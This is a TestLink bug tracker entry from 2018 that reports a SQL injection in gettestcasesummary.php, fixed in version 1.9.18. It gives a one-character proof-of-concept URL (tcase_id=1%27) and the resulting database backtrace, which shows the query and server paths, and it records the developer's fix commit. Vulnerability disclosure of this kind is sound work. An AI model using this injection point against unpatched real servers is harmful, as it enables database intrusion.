Mantis Bugtracker          
testlink.org

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0008301TestLinkSecurity - SQL Injectionpublic2018-06-18 13:002018-10-06 12:17
ReporterMaksymilian Arciemowicz 
Assigned Tofman 
PriorityurgentSeverityblockReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version1.9.16 (2016 Q4) 
Fixed in Version1.9.18 (2018 Q3) 
Summary0008301: SQL Injection gettestcasesummary.php
DescriptionSQL Injection here

PoC
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27 [^]
Additional Information ==============================================================================
 DB Access Error - debug_print_backtrace() OUTPUT START
 ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200)
            Having this additional Information could be useful for reporting
            issue to development TEAM.
 ==============================================================================
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]
TagsNo tags attached.
Database (MySQL,Postgres,etc)MySQL
Browser
PHP Version
TestCaseID
QA Team - Task Workflow StatusREADY FOR TESTING
Attached Files

- Relationships

-  Notes
(0027600)
fman (administrator)
2018-06-18 17:42

https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3 [^]
(0027601)
fman (administrator)
2018-06-18 17:42

thanks.
would you mind to test fix?

regards
(0027604)
Maksymilian Arciemowicz (reporter)
2018-06-18 18:11

thanks.. looks well.
(0027942)
fman (administrator)
2018-10-06 12:17

1.9.18 released

- Issue History
Date Modified Username Field Change
2018-06-18 13:00 Maksymilian Arciemowicz New Issue
2018-06-18 17:42 fman QA Team - Task Workflow Status => READY FOR TESTING
2018-06-18 17:42 fman Note Added: 0027600
2018-06-18 17:42 fman Status new => resolved
2018-06-18 17:42 fman Fixed in Version => 1.9.18 (2018 Q3)
2018-06-18 17:42 fman Resolution open => fixed
2018-06-18 17:42 fman Assigned To => fman
2018-06-18 17:42 fman Product Version => 1.9.16 (2016 Q4)
2018-06-18 17:42 fman Note Added: 0027601
2018-06-18 18:11 Maksymilian Arciemowicz Note Added: 0027604
2018-10-06 12:17 fman Note Added: 0027942
2018-10-06 12:17 fman Status resolved => closed



Copyright © 2000 - 2018 MantisBT Team
Powered by Mantis Bugtracker